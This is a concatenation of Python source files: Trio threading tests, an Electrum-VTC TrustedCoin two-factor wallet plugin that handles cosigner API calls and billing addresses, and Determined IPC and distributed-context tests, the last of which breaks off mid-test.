callee_token = from_thread_run_sync(_core.current_trio_token)
return callee_token
caller_token = _core.current_trio_token()
callee_token = await to_thread_run_sync(thread_fn)
assert callee_token == caller_token
async def test_trio_from_thread_token_kwarg():
# Test that to_thread_run_sync and spawned trio.from_thread.run_sync() can
# use an explicitly defined token
def thread_fn(token):
callee_token = from_thread_run_sync(_core.current_trio_token, trio_token=token)
return callee_token
caller_token = _core.current_trio_token()
callee_token = await to_thread_run_sync(thread_fn, caller_token)
assert callee_token == caller_token
async def test_from_thread_no_token():
# Test that a "raw call" to trio.from_thread.run() fails because no token
# has been provided
with pytest.raises(RuntimeError):
from_thread_run_sync(_core.current_time)
def test_run_fn_as_system_task_catched_badly_typed_token():
with pytest.raises(RuntimeError):
from_thread_run_sync(_core.current_time, trio_token="Not TrioTokentype")
async def test_from_thread_inside_trio_thread():
def not_called(): # pragma: no cover
assert False
trio_token = _core.current_trio_token()
with pytest.raises(RuntimeError):
from_thread_run_sync(not_called, trio_token=trio_token)
|
trustedcoin.py
|
#!/usr/bin/env python
#
# Electrum - Lightweight Bitcoin Client
# Copyright (C) 2015 Thomas Voegtlin
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import socket
import os
import time
import requests
import json
import base64
from urllib.parse import urljoin
from urllib.parse import quote
import electrum_vtc
from electrum_vtc import bitcoin, ecc
from electrum_vtc import constants
from electrum_vtc import keystore
from electrum_vtc.bitcoin import *
from electrum_vtc.mnemonic import Mnemonic
from electrum_vtc import version
from electrum_vtc.wallet import Multisig_Wallet, Deterministic_Wallet
from electrum_vtc.i18n import _
from electrum_vtc.plugins import BasePlugin, hook
from electrum_vtc.util import NotEnoughFunds
from electrum_vtc.storage import STO_EV_USER_PW
# signing_xpub is hardcoded so that the wallet can be restored from seed, without TrustedCoin's server
def get_signing_xpub():
if constants.net.TESTNET:
return "tpubD6NzVbkrYhZ4XdmyJQcCPjQfg6RXVUzGFhPjZ7uvRC8JLcS7Hw1i7UTpyhp9grHpak4TyK2hzBJrujDVLXQ6qB5tNpVx9rC6ixijUXadnmY"
else:
return "xpub661MyMwAqRbcGnMkaTx2594P9EDuiEqMq25PM2aeG6UmwzaohgA6uDmNsvSUV8ubqwA3Wpste1hg69XHgjUuCD5HLcEp2QPzyV1HMrPppsL"
def get_billing_xpub():
if constants.net.TESTNET:
return "tpubD6NzVbkrYhZ4X11EJFTJujsYbUmVASAYY7gXsEt4sL97AMBdypiH1E9ZVTpdXXEy3Kj9Eqd1UkxdGtvDt5z23DKsh6211CfNJo8bLLyem5r"
else:
return "xpub6DTBdtBB8qUmH5c77v8qVGVoYk7WjJNpGvutqjLasNG1mbux6KsojaLrYf2sRhXAVU4NaFuHhbD9SvVPRt1MB1MaMooRuhHcAZH1yhQ1qDU"
SEED_PREFIX = version.SEED_PREFIX_2FA
DISCLAIMER = [
_("Two-factor authentication is a service provided by TrustedCoin. "
"It uses a multi-signature wallet, where you own 2 of 3 keys. "
"The third key is stored on a remote server that signs transactions on "
"your behalf. To use this service, you will need a smartphone with "
"Google Authenticator installed."),
_("A small fee will be charged on each transaction that uses the "
"remote server. You may check and modify your billing preferences "
"once the installation is complete."),
_("Note that your coins are not locked in this service. You may withdraw "
"your funds at any time and at no cost, without the remote server, by "
"using the 'restore wallet' option with your wallet seed."),
_("The next step will generate the seed of your wallet. This seed will "
"NOT be saved in your computer, and it must be stored on paper. "
"To be safe from malware, you may want to do this on an offline "
"computer, and move your wallet later to an online computer."),
]
KIVY_DISCLAIMER = [
_("Two-factor authentication is a service provided by TrustedCoin. "
"To use it, you must have a separate device with Google Authenticator."),
_("This service uses a multi-signature wallet, where you own 2 of 3 keys. "
"The third key is stored on a remote server that signs transactions on "
"your behalf. A small fee will be charged on each transaction that uses the "
"remote server."),
_("Note that your coins are not locked in this service. You may withdraw "
"your funds at any time and at no cost, without the remote server, by "
"using the 'restore wallet' option with your wallet seed."),
]
RESTORE_MSG = _("Enter the seed for your 2-factor wallet:")
class TrustedCoinException(Exception):
def __init__(self, message, status_code=0):
Exception.__init__(self, message)
self.status_code = status_code
class ErrorConnectingServer(Exception):
pass
class TrustedCoinCosignerClient(object):
def __init__(self, user_agent=None, base_url='https://api.trustedcoin.com/2/'):
self.base_url = base_url
self.debug = False
self.user_agent = user_agent
    def send_request(self, method, relative_url, data=None, headers=None):
        # optional extra headers let transfer_credit() pass its x-signature header
        kwargs = {'headers': dict(headers) if headers else {}}
if self.user_agent:
kwargs['headers']['user-agent'] = self.user_agent
if method == 'get' and data:
kwargs['params'] = data
elif method == 'post' and data:
kwargs['data'] = json.dumps(data)
kwargs['headers']['content-type'] = 'application/json'
url = urljoin(self.base_url, relative_url)
if self.debug:
print('%s %s %s' % (method, url, data))
try:
response = requests.request(method, url, **kwargs)
except Exception as e:
raise ErrorConnectingServer(e)
if self.debug:
print(response.text)
if response.status_code != 200:
message = str(response.text)
if response.headers.get('content-type') == 'application/json':
r = response.json()
if 'message' in r:
message = r['message']
raise TrustedCoinException(message, response.status_code)
if response.headers.get('content-type') == 'application/json':
return response.json()
else:
return response.text
def get_terms_of_service(self, billing_plan='electrum-per-tx-otp'):
"""
Returns the TOS for the given billing plan as a text/plain unicode string.
:param billing_plan: the plan to return the terms for
"""
payload = {'billing_plan': billing_plan}
return self.send_request('get', 'tos', payload)
def create(self, xpubkey1, xpubkey2, email, billing_plan='electrum-per-tx-otp'):
"""
Creates a new cosigner resource.
:param xpubkey1: a bip32 extended public key (customarily the hot key)
:param xpubkey2: a bip32 extended public key (customarily the cold key)
:param email: a contact email
:param billing_plan: the billing plan for the cosigner
"""
payload = {
'email': email,
'xpubkey1': xpubkey1,
'xpubkey2': xpubkey2,
'billing_plan': billing_plan,
}
return self.send_request('post', 'cosigner', payload)
def auth(self, id, otp):
"""
Attempt to authenticate for a particular cosigner.
:param id: the id of the cosigner
:param otp: the one time password
"""
payload = {'otp': otp}
return self.send_request('post', 'cosigner/%s/auth' % quote(id), payload)
def get(self, id):
""" Get billing info """
return self.send_request('get', 'cosigner/%s' % quote(id))
def get_challenge(self, id):
""" Get challenge to reset Google Auth secret """
return self.send_request('get', 'cosigner/%s/otp_secret' % quote(id))
def reset_auth(self, id, challenge, signatures):
""" Reset Google Auth secret """
payload = {'challenge':challenge, 'signatures':signatures}
return self.send_request('post', 'cosigner/%s/otp_secret' % quote(id), payload)
def sign(self, id, transaction, otp):
"""
Ask the server to co-sign a transaction for a particular cosigner.
:param id: the id of the cosigner
:param transaction: the hex encoded [partially signed] compact transaction to sign
:param otp: the one time password
"""
payload = {
'otp': otp,
'transaction': transaction
}
return self.send_request('post', 'cosigner/%s/sign' % quote(id), payload)
def transfer_credit(self, id, recipient, otp, signature_callback):
"""
Transfer a cosigner's credits to another cosigner.
:param id: the id of the sending cosigner
:param recipient: the id of the recipient cosigner
:param otp: the one time password (of the sender)
:param signature_callback: a callback that signs a text message using xpubkey1/0/0 returning a compact sig
"""
payload = {
'otp': otp,
'recipient': recipient,
'timestamp': int(time.time()),
}
relative_url = 'cosigner/%s/transfer' % quote(id)
full_url = urljoin(self.base_url, relative_url)
headers = {
'x-signature': signature_callback(full_url + '\n' + json.dumps(payload))
}
return self.send_request('post', relative_url, payload, headers)
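# A minimal usage sketch of the cosigner API above (hypothetical values, shown only for
# illustration; the real flow is driven by the wizard code further down in this module):
#
#   client = TrustedCoinCosignerClient(user_agent="Electrum/x.y")
#   info = client.create(xpub1, xpub2, "user@example.com")   # register a 2-of-3 wallet
#   client.auth(info['id'], otp)                             # confirm the Google Auth OTP
#   signed = client.sign(info['id'], raw_tx_hex, otp)        # server adds its signature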
server = TrustedCoinCosignerClient(user_agent="Electrum/" + version.ELECTRUM_VERSION)
class Wallet_2fa(Multisig_Wallet):
wallet_type = '2fa'
def __init__(self, storage):
self.m, self.n = 2, 3
Deterministic_Wallet.__init__(self, storage)
self.is_billing = False
self.billing_info = None
self._load_billing_addresses()
def _load_billing_addresses(self):
billing_addresses = self.storage.get('trustedcoin_billing_addresses', {})
self._billing_addresses = {} # index -> addr
# convert keys from str to int
for index, addr in list(billing_addresses.items()):
self._billing_addresses[int(index)] = addr
self._billing_addresses_set = set(self._billing_addresses.values()) # set of addrs
def can_sign_without_server(self):
return not self.keystores['x2/'].is_watching_only()
def get_user_id(self):
return get_user_id(self.storage)
def min_prepay(self):
return min(self.price_per_tx.keys())
def num_prepay(self, config):
default = self.min_prepay()
n = config.get('trustedcoin_prepay', default)
if n not in self.price_per_tx:
n = default
return n
def extra_fee(self, config):
if self.can_sign_without_server():
return 0
if self.billing_info is None:
self.plugin.start_request_thread(self)
return 0
if self.billing_info.get('tx_remaining'):
return 0
if self.is_billing:
return 0
n = self.num_prepay(config)
price = int(self.price_per_tx[n])
if price > 100000 * n:
raise Exception('too high trustedcoin fee ({} for {} txns)'.format(price, n))
return price
def make_unsigned_transaction(self, coins, outputs, config, fixed_fee=None,
change_addr=None, is_sweep=False):
mk_tx = lambda o: Multisig_Wallet.make_unsigned_transaction(
self, coins, o, config, fixed_fee, change_addr)
fee = self.extra_fee(config) if not is_sweep else 0
if fee:
address = self.billing_info['billing_address']
fee_output = (TYPE_ADDRESS, address, fee)
try:
tx = mk_tx(outputs + [fee_output])
except NotEnoughFunds:
# TrustedCoin won't charge if the total input value is
# lower than their fee
tx = mk_tx(outputs)
if tx.input_value() >= fee:
raise
self.print_error("not charging for this tx")
else:
tx = mk_tx(outputs)
return tx
def on_otp(self, tx, otp):
if not otp:
self.print_error("sign_transaction: no auth code")
return
otp = int(otp)
long_user_id, short_id = self.get_user_id()
raw_tx = tx.serialize_to_network()
r = server.sign(short_id, raw_tx, otp)
if r:
raw_tx = r.get('transaction')
tx.update(raw_tx)
self.print_error("twofactor: is complete", tx.is_complete())
# reset billing_info
self.billing_info = None
self.plugin.start_request_thread(self)
def add_new_billing_address(self, billing_index: int, address: str):
saved_addr = self._billing_addresses.get(billing_index)
if saved_addr is not None:
if saved_addr == address:
return # already saved this address
else:
raise Exception('trustedcoin billing address inconsistency.. '
'for index {}, already saved {}, now got {}'
.format(billing_index, saved_addr, address))
# do we have all prior indices? (are we synced?)
largest_index_we_have = max(self._billing_addresses) if self._billing_addresses else -1
if largest_index_we_have + 1 < billing_index: # need to sync
for i in range(largest_index_we_have + 1, billing_index):
addr = make_billing_address(self, i)
self._billing_addresses[i] = addr
self._billing_addresses_set.add(addr)
# save this address; and persist to disk
self._billing_addresses[billing_index] = address
self._billing_addresses_set.add(address)
self.storage.put('trustedcoin_billing_addresses', self._billing_addresses)
# FIXME this often runs in a daemon thread, where storage.write will fail
self.storage.write()
def is_billing_address(self, addr: str) -> bool:
return addr in self._billing_addresses_set
# Utility functions
def get_user_id(storage):
def make_long_id(xpub_hot, xpub_cold):
return bitcoin.sha256(''.join(sorted([xpub_hot, xpub_cold])))
xpub1 = storage.get('x1/')['xpub']
xpub2 = storage.get('x2/')['xpub']
long_id = make_long_id(xpub1, xpub2)
short_id = hashlib.sha256(long_id).hexdigest()
return long_id, short_id
def make_xpub(xpub, s):
version, _, _, _, c, cK = deserialize_xpub(xpub)
cK2, c2 = bitcoin._CKD_pub(cK, c, s)
return bitcoin.serialize_xpub(version, c2, cK2)
def make_billing_address(wallet, num):
long_id, short_id = wallet.get_user_id()
xpub = make_xpub(get_billing_xpub(), long_id)
version, _, _, _, c, cK = deserialize_xpub(xpub)
cK, c = bitcoin.CKD_pub(cK, c, num)
return bitcoin.public_key_to_p2pkh(cK)
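# Sketch of how the helpers above fit together (names taken from this module; shown only
# as a comment, the real calls happen in the wallet/plugin code below):
#
#   long_id, short_id = get_user_id(storage)
#   xpub3 = make_xpub(get_signing_xpub(), long_id)      # server key, restorable from seed
#   addr = make_billing_address(wallet, n)              # n-th TrustedCoin billing address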
class TrustedCoinPlugin(BasePlugin):
wallet_class = Wallet_2fa
disclaimer_msg = DISCLAIMER
def __init__(self, parent, config, name):
BasePlugin.__init__(self, parent, config, name)
self.wallet_class.plugin = self
self.requesting = False
@staticmethod
def is_valid_seed(seed):
return bitcoin.is_new_seed(seed, SEED_PREFIX)
def is_available(self):
return True
def is_enabled(self):
return True
def can_user_disable(self):
return False
@hook
def tc_sign_wrapper(self, wallet, tx, on_success, on_failure):
if not isinstance(wallet, self.wallet_class):
return
if tx.is_complete():
return
if wallet.can_sign_without_server():
return
if not wallet.keystores['x3/'].get_tx_derivations(tx):
self.print_error("twofactor: xpub3 not needed")
return
def wrapper(tx):
self.prompt_user_for_otp(wallet, tx, on_success, on_failure)
return wrapper
@hook
def get_tx_extra_fee(self, wallet, tx):
if type(wallet) != Wallet_2fa:
return
for _type, addr, amount in tx.outputs():
if _type == TYPE_ADDRESS and wallet.is_billing_address(addr):
return addr, amount
def finish_requesting(func):
def f(self, *args, **kwargs):
try:
return func(self, *args, **kwargs)
finally:
self.requesting = False
return f
@finish_requesting
def request_billing_info(self, wallet):
if wallet.can_sign_without_server():
return
self.print_error("request billing info")
try:
billing_info = server.get(wallet.get_user_id()[1])
except ErrorConnectingServer as e:
self.print_error('cannot connect to TrustedCoin server: {}'.format(e))
return
billing_index = billing_info['billing_index']
billing_address = make_billing_address(wallet, billing_index)
if billing_address != billing_info['billing_address']:
raise Exception('unexpected trustedcoin billing address: expected {}, received {}'
.format(billing_address, billing_info['billing_address']))
wallet.add_new_billing_address(billing_index, billing_address)
wallet.billing_info = billing_info
wallet.price_per_tx = dict(billing_info['price_per_tx'])
wallet.price_per_tx.pop(1, None)
return True
def start_request_thread(self, wallet):
from threading import Thread
if self.requesting is False:
self.requesting = True
t = Thread(target=self.request_billing_info, args=(wallet,))
t.daemon = True
t.start()
return t
def make_seed(self):
return Mnemonic('english').make_seed(seed_type='2fa', num_bits=128)
@hook
def do_clear(self, window):
window.wallet.is_billing = False
def show_disclaimer(self, wizard):
wizard.set_icon(':icons/trustedcoin-wizard.png')
wizard.stack = []
wizard.confirm_dialog(title='Disclaimer', message='\n\n'.join(self.disclaimer_msg), run_next = lambda x: wizard.run('choose_seed'))
def choose_seed(self, wizard):
title = _('Create or restore')
message = _('Do you want to create a new seed, or to restore a wallet using an existing seed?')
choices = [
('create_seed', _('Create a new seed')),
('restore_wallet', _('I already have a seed')),
]
wizard.choice_dialog(title=title, message=message, choices=choices, run_next=wizard.run)
def create_seed(self, wizard):
seed = self.make_seed()
f = lambda x: wizard.request_passphrase(seed, x)
wizard.show_seed_dialog(run_next=f, seed_text=seed)
@classmethod
def get_xkeys(self, seed, passphrase, derivation):
from electrum_vtc.mnemonic import Mnemonic
from electrum_vtc.keystore import bip32_root, bip32_private_derivation
bip32_seed = Mnemonic.mnemonic_to_seed(seed, passphrase)
xprv, xpub = bip32_root(bip32_seed, 'standard')
xprv, xpub = bip32_private_derivation(xprv, "m/", derivation)
return xprv, xpub
@classmethod
def xkeys_from_seed(self, seed, passphrase):
words = seed.split()
n = len(words)
# old versions used long seed phrases
if n >= 20:
# note: pre-2.7 2fa seeds were typically 24-25 words, however they
# could probabilistically be arbitrarily shorter due to a bug. (see #3611)
# the probability of it being < 20 words is about 2^(-(256+12-19*11)) = 2^(-59)
if passphrase != '':
raise Exception('old 2fa seed cannot have passphrase')
xprv1, xpub1 = self.get_xkeys(' '.join(words[0:12]), '', "m/")
xprv2, xpub2 = self.get_xkeys(' '.join(words[12:]), '', "m/")
elif n==12:
xprv1, xpub1 = self.get_xkeys(seed, passphrase, "m/0'/")
xprv2, xpub2 = self.get_xkeys(seed, passphrase, "m/1'/")
else:
raise Exception('unrecognized seed length: {} words'.format(n))
return xprv1, xpub1, xprv2, xpub2
def create_keystore(self, wizard, seed, passphrase):
# this overloads the wizard's method
xprv1, xpub1, xprv2, xpub2 = self.xkeys_from_seed(seed, passphrase)
k1 = keystore.from_xprv(xprv1)
k2 = keystore.from_xpub(xpub2)
wizard.request_password(run_next=lambda pw, encrypt: self.on_password(wizard, pw, encrypt, k1, k2))
def on_password(self, wizard, password, encrypt_storage, k1, k2):
k1.update_password(None, password)
wizard.storage.set_keystore_encryption(bool(password))
if encrypt_storage:
wizard.storage.set_password(password, enc_version=STO_EV_USER_PW)
wizard.storage.put('x1/', k1.dump())
wizard.storage.put('x2/', k2.dump())
wizard.storage.write()
self.go_online_dialog(wizard)
def restore_wallet(self, wizard):
wizard.opt_bip39 = False
wizard.opt_ext = True
title = _("Restore two-factor Wallet")
f = lambda seed, is_bip39, is_ext: wizard.run('on_restore_seed', seed, is_ext)
wizard.restore_seed_dialog(run_next=f, test=self.is_valid_seed)
def on_restore_seed(self, wizard, seed, is_ext):
f = lambda x: self.restore_choice(wizard, seed, x)
wizard.passphrase_dialog(run_next=f) if is_ext else f('')
def restore_choice(self, wizard, seed, passphrase):
wizard.set_icon(':icons/trustedcoin-wizard.png')
wizard.stack = []
title = _('Restore 2FA wallet')
msg = ' '.join([
'You are going to restore a wallet protected with two-factor authentication.',
'Do you want to keep using two-factor authentication with this wallet,',
'or do you want to disable it, and have two master private keys in your wallet?'
])
choices = [('keep', 'Keep'), ('disable', 'Disable')]
f = lambda x: self.on_choice(wizard, seed, passphrase, x)
wizard.choice_dialog(choices=choices, message=msg, title=title, run_next=f)
def on_choice(self, wizard, seed, passphrase, x):
if x == 'disable':
f = lambda pw, encrypt: wizard.run('on_restore_pw', seed, passphrase, pw, encrypt)
wizard.request_password(run_next=f)
else:
self.create_keystore(wizard, seed, passphrase)
def on_restore_pw(self, wizard, seed, passphrase, password, encrypt_storage):
storage = wizard.storage
xprv1, xpub1, xprv2, xpub2 = self.xkeys_from_seed(seed, passphrase)
k1 = keystore.from_xprv(xprv1)
k2 = keystore.from_xprv(xprv2)
k1.add_seed(seed)
k1.update_password(None, password)
k2.update_password(None, password)
storage.put('x1/', k1.dump())
storage.put('x2/', k2.dump())
long_user_id, short_id = get_user_id(storage)
xpub3 = make_xpub(get_signing_xpub(), long_user_id)
k3 = keystore.from_xpub(xpub3)
storage.put('x3/', k3.dump())
storage.set_keystore_encryption(bool(password))
if encrypt_storage:
storage.set_password(password, enc_version=STO_EV_USER_PW)
wizard.wallet = Wallet_2fa(storage)
wizard.create_addresses()
def create_remote_key(self, email, wizard):
xpub1 = wizard.storage.get('x1/')['xpub']
xpub2 = wizard.storage.get('x2/')['xpub']
# Generate third key deterministically.
long_user_id, short_id = get_user_id(wizard.storage)
xpub3 = make_xpub(get_signing_xpub(), long_user_id)
# secret must be sent by the server
try:
r = server.create(xpub1, xpub2, email)
except (socket.error, ErrorConnectingServer):
wizard.show_message('Server not reachable, aborting')
wizard.terminate()
return
except TrustedCoinException as e:
if e.status_code == 409:
r = None
else:
wizard.show_message(str(e))
return
if r is None:
otp_secret = None
else:
otp_secret = r.get('otp_secret')
if not otp_secret:
wizard.show_message(_('Error'))
return
_xpub3 = r['xpubkey_cosigner']
_id = r['id']
if short_id != _id:
wizard.show_message("unexpected trustedcoin short_id: expected {}, received {}"
.format(short_id, _id))
return
if xpub3 != _xpub3:
wizard.show_message("unexpected trustedcoin xpub3: expected {}, received {}"
.format(xpub3, _xpub3))
return
self.request_otp_dialog(wizard, short_id, otp_secret, xpub3)
def check_otp(self, wizard, short_id, otp_secret, xpub3, otp, reset):
if otp:
self.do_auth(wizard, short_id, otp, xpub3)
elif reset:
wizard.opt_bip39 = False
wizard.opt_ext = True
f = lambda seed, is_bip39, is_ext: wizard.run('on_reset_seed', short_id, seed, is_ext, xpub3)
wizard.restore_seed_dialog(run_next=f, test=self.is_valid_seed)
def on_reset_seed(self, wizard, short_id, seed, is_ext, xpub3):
f = lambda passphrase: wizard.run('on_reset_auth', short_id, seed, passphrase, xpub3)
wizard.passphrase_dialog(run_next=f) if is_ext else f('')
def do_auth(self, wizard, short_id, otp, xpub3):
try:
server.auth(short_id, otp)
except TrustedCoinException as e:
if e.status_code == 400: # invalid OTP
wizard.show_message(_('Invalid one-time password.'))
# ask again for otp
self.request_otp_dialog(wizard, short_id, None, xpub3)
else:
wizard.show_message(str(e))
wizard.terminate()
except Exception as e:
wizard.show_message(str(e))
wizard.terminate()
else:
k3 = keystore.from_xpub(xpub3)
wizard.storage.put('x3/', k3.dump())
wizard.storage.put('use_trustedcoin', True)
wizard.storage.write()
wizard.wallet = Wallet_2fa(wizard.storage)
wizard.run('create_addresses')
def on_reset_auth(self, wizard, short_id, seed, passphrase, xpub3):
xprv1, xpub1, xprv2, xpub2 = self.xkeys_from_seed(seed, passphrase)
if (wizard.storage.get('x1/')['xpub'] != xpub1 or
wizard.storage.get('x2/')['xpub'] != xpub2):
wizard.show_message(_('Incorrect seed'))
return
r = server.get_challenge(short_id)
challenge = r.get('challenge')
message = 'TRUSTEDCOIN CHALLENGE: ' + challenge
def f(xprv):
_, _, _, _, c, k = deserialize_xprv(xprv)
pk = bip32_private_key([0, 0], k, c)
key = ecc.ECPrivkey(pk)
sig = key.sign_message(message, True)
return base64.b64encode(sig).decode()
signatures = [f(x) for x in [xprv1, xprv2]]
r = server.reset_auth(short_id, challenge, signatures)
new_secret = r.get('otp_secret')
if not new_secret:
wizard.show_message(_('Request rejected by server'))
return
self.request_otp_dialog(wizard, short_id, new_secret, xpub3)
@hook
def get_action(self, storage):
if storage.get('wallet_type') != '2fa':
return
if not storage.get('x1/'):
return self, 'show_disclaimer'
if not storage.get('x2/'):
return self, 'show_disclaimer'
if not storage.get('x3/'):
return self, 'accept_terms_of_use'
|
test_ipc.py
|
import abc
import itertools
import multiprocessing
import sys
import textwrap
import time
import traceback
from typing import Any, List, Optional, cast
import pytest
import determined as det
from determined import core, ipc
from tests import parallel
class Subproc(multiprocessing.Process):
"""
Subproc executes an abstract main(), returning the stacktrace as a string in join().
"""
def __init__(self, *arg: Any, **kwarg: Any):
self._error_queue = multiprocessing.Queue() # type: Any
super().__init__(*arg, **kwarg)
def run(self) -> None:
try:
self.main()
except Exception:
self._error_queue.put(traceback.format_exc())
def join_and_check(self, *args: Any, **kwargs: Any) -> Optional[str]:
super().join(*args, **kwargs)
if not self._error_queue.empty():
return cast(str, self._error_queue.get())
return None
@abc.abstractmethod
def main(self) -> None:
pass
class SubprocGroup(list):
"""
SubprocGroup provides a context manager to coordinate opening and closing of many Subprocs.
"""
def join_all(self) -> None:
# Every process should be joinable within one second.
errors = [subproc.join_and_check(timeout=1) for subproc in self]
# Terminate any processes which did not exit in time.
num_unterminated = 0
for subproc in self:
if subproc.is_alive():
subproc.terminate()
subproc.join()
num_unterminated += 1
assert num_unterminated == 0
# Make sure none of the processes raised an error.
errors = [e for e in errors if e is not None]
if len(errors):
print("Traceback from child process:", file=sys.stderr)
print(textwrap.indent(errors[0], "|"), file=sys.stderr)
raise AssertionError("failure in child process")
def __enter__(self) -> "SubprocGroup":
for subproc in self:
subproc.start()
return self
def __exit__(self, *_: Any) -> None:
self.join_all()
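# A small sketch (not part of the original tests) of how Subproc and SubprocGroup are meant
# to be combined: subclass Subproc, implement main(), and run several copies under the
# context manager, which starts them on __enter__ and joins them on __exit__.
#
#   class NoopSubproc(Subproc):
#       def main(self) -> None:
#           pass
#
#   with SubprocGroup(NoopSubproc() for _ in range(3)):
#       pass  # join_all() runs on exit and reports any child traceback as an AssertionError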
class BroadcastClientSubproc(Subproc):
def __init__(
self, rank: int, size: int, pub_url: str, pull_url: str, exp_msgs: List[int]
) -> None:
self._rank = rank
self._size = size
self._pub_url = pub_url
self._pull_url = pull_url
self._exp_msgs = exp_msgs
super().__init__()
def main(self) -> None:
with ipc.ZMQBroadcastClient(self._pub_url, self._pull_url) as broadcast_client:
# Start the server-client communication test.
broadcast_client.send(ipc.ConnectedMessage(process_id=0))
for exp in self._exp_msgs:
msg = broadcast_client.recv()
assert msg == exp
broadcast_client.send(2 * msg)
def test_broadcast_server_client() -> None:
num_subprocs = 3
with ipc.ZMQBroadcastServer(num_connections=num_subprocs) as broadcast_server:
pub_url = f"tcp://localhost:{broadcast_server.get_pub_port()}"
pull_url = f"tcp://localhost:{broadcast_server.get_pull_port()}"
msgs = list(range(10))
with SubprocGroup(
BroadcastClientSubproc(i, num_subprocs, pub_url, pull_url, msgs)
for i in range(num_subprocs)
) as subprocs:
def health_check() -> None:
assert all(subproc.is_alive() for subproc in subprocs)
for subproc in subprocs:
assert subproc.is_alive()
gathered, _ = broadcast_server.gather_with_polling(health_check)
assert all(isinstance(g, ipc.ConnectedMessage) for g in gathered)
for msg in msgs:
broadcast_server.broadcast(msg)
gathered, _ = broadcast_server.gather_with_polling(health_check)
assert all(g == 2 * msg for g in gathered)
def test_zmq_server_client() -> None:
server = ipc.ZMQServer(num_connections=1, ports=None, port_range=(1000, 65535))
assert len(server.get_ports()) == 1
port = server.get_ports()[0]
assert 1000 <= port <= 65535
client = ipc.ZMQClient(ip_address="localhost", port=port)
client_object = {"DeterminedAI": "Great", "det": "Fantastic", 12345: -100}
client.send(client_object)
server_object = server.receive_blocking(send_rank=0)
assert server_object == client_object
server_object["DeterminedAI"] = "VeryGreat"
server.send(server_object)
client_object = client.receive()
assert server_object == client_object
@pytest.mark.parametrize("cross_size", [1, 4])
@pytest.mark.parametrize("local_size", [1, 4])
@pytest.mark.parametrize("force_tcp", [False, True])
def test_distributed_context(cross_size: int, local_size: int, force_tcp: bool) -> None:
size = cross_size * local_size
# Make sure `make test` doesn't hang on a macbook's default open-file limit. Avoid skipping
# on linux, where such a low limit is not a common default, to avoid false positives in CI.
if sys.platform == "darwin" and size == 16:
import resource
if resource.getrlimit(resource.RLIMIT_NOFILE)[0] < 1024:
pytest.skip(
"increase the open fd limit with `ulimit -n 1024` or greater to run this test"
)
with parallel.Execution(size, local_size=local_size, make_distributed_context=False) as pex:
@pex.run
def contexts() -> core.DistributedContext:
return core.DistributedContext(
rank=pex.rank,
size=pex.size,
local_rank=pex.local_rank,
local_size=pex.local_size,
cross_rank=pex.cross_rank,
cross_size=pex.cross_size,
chief_ip="localhost",
force_tcp=force_tcp,
)
# Perform a broadcast.
results = pex.run(lambda: contexts[pex.rank].broadcast(pex.rank)) # type: ignore
assert results == [0] * size, "not all threads ran broadcast correctly"
# Perform a local broadcast.
results = pex.run(lambda: contexts[pex.rank].broadcast_local(pex.rank))
expect = [rank - (rank % local_size) for rank in range(size)] # type: Any
assert results == expect, "not all threads ran broadcast_local correctly"
# Perform a gather.
results = pex.run(lambda: set(contexts[pex.rank].gather(pex.rank) or []))
expect = [set(range(size)) if rank == 0 else set() for rank in range(size)]
assert results == expect, "not all threads ran gather correctly"
# Perform a local gather.
results = pex.run(lambda: set(contexts[pex.rank].gather_local(pex.rank) or []))
expect = [
set(range(rank, rank + local_size)) if rank % local_size == 0 else set()
for rank in range(size)
]
assert results == expect, "not all threads ran gather correctly"
# Perform an allgather.
results = pex.run(lambda: set(contexts[pex.rank].allgather(pex.rank)))
expect = set(range(size))
assert results == [expect] * size, "not all threads ran allgather correctly"
# Perform a local allgather.
results = pex.run(lambda: set(contexts[pex.rank].allgather_local(pex.rank)))
expect = [
set(range(cross_rank * local_size, (cross_rank + 1) * local_size))
for cross_rank, _ in itertools.product(range(cross_size), range(local_size))
]
assert results == expect, "not all threads ran allgather_local correctly"
# Close all contexts.
for context in contexts:
context.close()
class TestPIDServer:
@staticmethod
def _worker_proc(
addr: int,
keep_alive: bool = False,
sleep_time: float = 10,
repeat: int = 1,
crash: bool = False,
) -> None:
with ipc.PIDClient(addr) as pid_client:
for _ in range(repeat):
if keep_alive:
pid_client.keep_alive()
time.sleep(sleep_time)
if crash:
raise ValueError("Crashing...")
def test_normal_execution(self) -> None:
with ipc.PIDServer(addr=0, num_clients=2) as pid_server:
assert pid_server.listener
_, port = pid_server.listener.getsockname()
procs = [
multiprocessing.Process(
target=TestPIDServer._worker_proc, args=(port, True, 0.1, 5)
),
multiprocessing.Process(
target=TestPIDServer._worker_proc, args=(port, True, 0.1, 5)
),
]
for p in procs:
p.start()
pid_server.run()
for p in procs:
p.join()
assert len(pid_server.graceful_shutdowns) == 2
def test_worker_crashes(self) -> None:
with ipc.PIDServer(addr=0, num_clients=2) as pid_server:
assert pid_server.listener
_, port = pid_server.listener.getsockname()
# Enforce that the crashed worker causes the exit before the other worker exits.
deadline = time.time() + 20
procs = [
multiprocessing.Process(target=TestPIDServer._worker_proc, args=(port, False, 30)),
multiprocessing.Process(
target=TestPIDServer._worker_proc, args=(port, False, 0.5, 1, True)
),
]
for p in procs:
p.start()
with pytest.raises(det.errors.WorkerError):
pid_server.run()
assert time.time() < deadline, "crashing worker did not trigger exit"
for p in procs:
p.terminate()
p.join()
assert len(pid_server.graceful_shutdowns) == 0
def test_return_code_on_worker_error(self) -> None:
with ipc.PIDServer(addr=0, num_clients=2) as pid_server:
assert pid_server.listener
_, port = pid_server.listener.getsockname()
# Enforce that the crashed worker causes the exit before the other worker exits.
deadline = time.time() + 20
# Enforce that run_subprocess exits nonzero on a worker failure, even if the main
